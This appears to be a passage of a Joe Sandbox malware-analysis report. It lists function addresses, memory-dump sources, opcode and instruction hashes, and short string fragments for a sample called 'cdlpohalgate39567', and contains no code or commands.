                                                                                                            • Snapshot File: hcaresult_7_2_c30000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 390a57f73973f633b3f30a2265e36d907fcd55b1838f7e9d30883e183e5db3e6
                                                                                                            • Instruction ID: 28f8cdc8a181d4908e25d235d90080d264e616a3e56d09cbb38a8a4894cda15b
                                                                                                            • Opcode Fuzzy Hash: 390a57f73973f633b3f30a2265e36d907fcd55b1838f7e9d30883e183e5db3e6
                                                                                                            • Instruction Fuzzy Hash: CA916C75910358CFEB14AFB0E85D7EEBBB1AB4A306F10542AD1017B2E5CB785A48CF58
                                                                                                            Function 00C32B00 Relevance: .2, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942574176.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c30000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 799f9add76d436dc2e191832fa70da685b239d18bb4a3989b4af54d25ad53679
                                                                                                            • Instruction ID: aa6f7e85ef49b0e1aa78cedd87ce923bd29ce298828c2b59d57cc42d1b1564fd
                                                                                                            • Opcode Fuzzy Hash: 799f9add76d436dc2e191832fa70da685b239d18bb4a3989b4af54d25ad53679
                                                                                                            • Instruction Fuzzy Hash: 1FB1A474E10218CFDB54DFA9D894A9DBBB2FF89304F2481A9D819AB365DB30AD41DF40
                                                                                                            Function 00C32AF1 Relevance: .1, Instructions: 135COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942574176.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c30000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 32fa791b1783a21b514a9a10a997ceada1af6ee33a2475df2804485f2cb5515f
                                                                                                            • Instruction ID: f6f6a9750c219142046b3032a2445db49cd28c01efc1f7b03b3c47ddaab6ce6e
                                                                                                            • Opcode Fuzzy Hash: 32fa791b1783a21b514a9a10a997ceada1af6ee33a2475df2804485f2cb5515f
                                                                                                            • Instruction Fuzzy Hash: A451D774E007488FDB08DFAAD49499DBBF2BF89300F248069D419AB365DB30A946DF10
                                                                                                            Function 00251DC8 Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: +s^$F $F $F
                                                                                                            • API String ID: 0-298040691
                                                                                                            • Opcode ID: b36237133f1cf3c598fd64b1f2ede3ceda654bc2e1ee81271624f1f5564a37a1
                                                                                                            • Instruction ID: 8a2a6812e0bee89d6fed05f59cb322aa8242edb0f2305ff52081dbef3f5d5298
                                                                                                            • Opcode Fuzzy Hash: b36237133f1cf3c598fd64b1f2ede3ceda654bc2e1ee81271624f1f5564a37a1
                                                                                                            • Instruction Fuzzy Hash: 0121DE70E043099FCB06EFB9C8556AEBBB2EF85301F10C4AAD814AB382D7744A55CF41
                                                                                                            Function 00251919 Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: F $F $F ${s^
                                                                                                            • API String ID: 0-3080361410
                                                                                                            • Opcode ID: 3b9431df210e937932f4f2d724efc23f7ee2c7d70bca4308a9220f1d977754e1
                                                                                                            • Instruction ID: 89cad4e9abe235f1bf92feec83d2eeb14822c8fdecb50e1df5d65cd85702a381
                                                                                                            • Opcode Fuzzy Hash: 3b9431df210e937932f4f2d724efc23f7ee2c7d70bca4308a9220f1d977754e1
                                                                                                            • Instruction Fuzzy Hash: 48219A74E10308EFDB05EFA9C4956AEB7B2EF85301F10C0A99814AB386DB349A55CF95
                                                                                                            Function 00251A08 Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: F $F $F $ks^
                                                                                                            • API String ID: 0-458938291
                                                                                                            • Opcode ID: 5a8f2038381fd64f4dfed6c702c22b3331556e2c6b63e03d00826e41b03e9b1a
                                                                                                            • Instruction ID: 7a1ab2b314027348265a41b0d7cf961c7eb70a4265b20a1436d6a883088bddfd
                                                                                                            • Opcode Fuzzy Hash: 5a8f2038381fd64f4dfed6c702c22b3331556e2c6b63e03d00826e41b03e9b1a
                                                                                                            • Instruction Fuzzy Hash: 6C21AE70E013099FDB05EFA9C4502AEB7B2EF85301F10C4AAD814AB386DB749A15CF45
                                                                                                            Function 00251BE8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: F $F $F $Ks^
                                                                                                            • API String ID: 0-2578142480
                                                                                                            • Opcode ID: 600a7bea98bfd31d18fb56a19694122d75f1050f4a32ae8ad6d73075e7c5dad2
                                                                                                            • Instruction ID: 0f2068316abbca86f6d9d8af618e4a46c14366431f5a6c67394c81425d96547f
                                                                                                            • Opcode Fuzzy Hash: 600a7bea98bfd31d18fb56a19694122d75f1050f4a32ae8ad6d73075e7c5dad2
                                                                                                            • Instruction Fuzzy Hash: EC219DB4E003099FDB05EFA9C4506AEBBF2EB85305F10C4AAD425AB395DB345A55CF41
                                                                                                            Function 00251CD9 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ;s^$F $F $F
                                                                                                            • API String ID: 0-1337398822
                                                                                                            • Opcode ID: 5460e178f9abe04672812bdf6ca16966c649f63f56fa2f85e7c58064bdf08a43
                                                                                                            • Instruction ID: c48c71fada678913c4e5a18ad621d016e49bb7717b36dae555bb6fae7ec17ff3
                                                                                                            • Opcode Fuzzy Hash: 5460e178f9abe04672812bdf6ca16966c649f63f56fa2f85e7c58064bdf08a43
                                                                                                            • Instruction Fuzzy Hash: A621BD70E103099FDB05EFB9C4506AEBBB2EF85301F10C5AAD815AB386DB345A55CF45
                                                                                                            Function 00251AF8 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.942204988.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_250000_cdlpohalgate39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: F $F $F $[s^
                                                                                                            • API String ID: 0-896210785
                                                                                                            • Opcode ID: 9579c9f0bc03417d0b6dc17b3f178d6ca0325a3bd621980ac980ce25a9f4978b
                                                                                                            • Instruction ID: 302d0d9bcad639e43c8e246fdfc4d2dc99b57632177839d860132c3fb24a9418
                                                                                                            • Opcode Fuzzy Hash: 9579c9f0bc03417d0b6dc17b3f178d6ca0325a3bd621980ac980ce25a9f4978b
                                                                                                            • Instruction Fuzzy Hash: 52219A70E143099FDB09EFB9C4503AEBBB2EB85305F10C4AAD415AB396EB349A55CF41